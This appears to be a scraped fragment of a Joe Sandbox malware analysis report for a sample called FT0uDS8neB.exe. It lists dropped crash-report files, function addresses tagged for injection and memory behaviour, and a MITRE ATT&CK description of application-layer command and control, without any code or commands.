
Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_RegSvcs.exe_31b14ea8eef64207fa147982c8a3c8467e2c79d_b7751e98_1a54ed59\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WERE635.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WERE7CD.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERE80C.tmp.xml

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\FT0uDS8neB.exe.log

C:\Windows\appcompat\Programs\Amcache.hve

C:\Windows\appcompat\Programs\Amcache.hve.LOG1

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Windows Analysis Report
FT0uDS8neB.exe

Function 03160DE7 Relevance: 2.0, Instructions: 1990
COMMON

Function 031651F8 Relevance: 1.6, Strings: 1, Instructions: 373
COMMON

Function 05A370F8 Relevance: 1.8, APIs: 1, Instructions: 321
processCOMMON

Function 05A36CE0 Relevance: 1.6, APIs: 1, Instructions: 116
injectionCOMMON

Function 05B7D028 Relevance: 1.6, APIs: 1, Instructions: 112
libraryCOMMON

Function 05A36B90 Relevance: 1.6, APIs: 1, Instructions: 101
memoryCOMMON

Function 05A369A8 Relevance: 1.6, APIs: 1, Instructions: 94
threadinjectionCOMMON

Function 05B7CD50 Relevance: 1.6, APIs: 1, Instructions: 92
memoryCOMMON

Function 05A36888 Relevance: 1.6, APIs: 1, Instructions: 73
threadCOMMON

Function 05B7E108 Relevance: 1.3, APIs: 1, Instructions: 93
memoryCOMMON

Function 031693D8 Relevance: .5, Instructions: 489
COMMON

Function 0316A2D0 Relevance: .4, Instructions: 406
COMMON

Function 03164B78 Relevance: .3, Instructions: 342
COMMON

Function 03169C18 Relevance: .2, Instructions: 224
COMMON

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre